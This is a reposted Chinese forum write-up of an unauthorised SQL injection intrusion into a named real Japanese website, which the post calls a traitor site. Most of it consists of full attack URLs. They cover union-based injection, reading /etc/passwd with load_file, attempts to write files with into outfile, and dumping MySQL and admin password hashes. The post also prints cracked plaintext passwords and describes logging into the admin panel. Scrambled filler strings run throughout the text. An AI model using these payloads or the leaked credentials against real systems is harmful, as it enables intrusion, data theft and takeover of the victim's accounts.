原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据
6 e" K4 [# d! j
+ h; C, K- L. c- b
whatweb
+ z: c- g4 B: U# J; C

' H1 f- }& C- a4 }8 Y$ f利用NMAP扫描
& S9 N2 F2 S/ C
- N* s8 z- D9 S0 _( m中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

1 M% Q( b3 n/ }& {$ }) N
, N1 c, f% g  m0x03.order by
% h! w( @9 U# w8 ]2 f. I             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
* f0 v& U7 V/ G  t; {
. U: c4 C+ R3 a" K' }6 ?order by 28报错，order by 27正常
' S4 l: G6 j, }, r
0x04.   union手动查询
7 n  s/ h- R& q4 T9 vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

+ I: U8 ]) }: \# a0 ^: [, `+ X- c: z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ D  G5 y& E' |* J+ \+ w
0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ S3 e3 }$ k# m6 @5 {
user:            root@localhost
database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

: P* m$ j! H) e5 W  d/ {; d" {* X0x06. root用户
. |  f8 v. S3 r( Z' y2 F利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
% |8 t* e  a* Q1 ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, o% x; \$ O: O' @
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

8 ~) l: {4 q8 a( s& t0x07. 利用 into outfile
全部都失败
5 J9 Z7 \4 |/ B, j2 @7 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
- k% D% l1 i! K
5 H1 R, k; \: Y! d! k/ m; k) Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
% v* k/ a0 r/ c7 b
页面显示“MDB2 Error:syntax error”

; v6 Q% l& o) [7 u0 k: N& u6 f0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 B8 e# L' G7 u4 Q9 j& J/ F

/ c! J7 _* _2 L8 G
0x09. 查找后台
  R; _$ W  R( y- H利用 现有的各种 后台工具尝试都不行
7 u* r" M$ q( }
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
1 F7 `- i  c, f3 d" r8 e可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
# L! p: K1 k4 d7 u3 K  `
这个可以在 www.cmd5.com 解密
( Q6 }$ ]- l- L7 ?; Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
0 T: n0 t+ o# M# I/ \. }. ]+ p% N$ _; Kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

6 @: k& i5 h- R, h4 S. C
, B+ }. E/ y9 g4 I3 i0x11. 网站突破
4 T, L/ ?( R4 |8 V* Q发现网站的源程序 openpne, google 下载 openpne 源码

- ?- A$ S- U* |# y4 m
- [6 B/ e5 a+ R& u( U' O0x12. 默认信息利用
1 }' g% X" W8 F/ j# _5 whttp://sns.zuaa.jp/?m=admin&a=page_login

$ H( `2 B4 R3 v. i* U) E表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
9 D- p  Z/ y  F) w0 q' h/ k
& {* L7 t, P. `8 A/ a$ y中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

( V# B4 n0 B2 z' ~3 a0x13. 登录后台
& q! K- ^$ r$ w  t" j& w

: B) z0 _0 K7 o! `& D
0x14. 小结
/ F6 z7 @% }' a2 P, k/ f, Z利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
- ^9 Y% ]) M; V; t感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
$ _& V7 x# F# D4 v: L$ j中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# d6 T1 T. m# M& ^! {
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的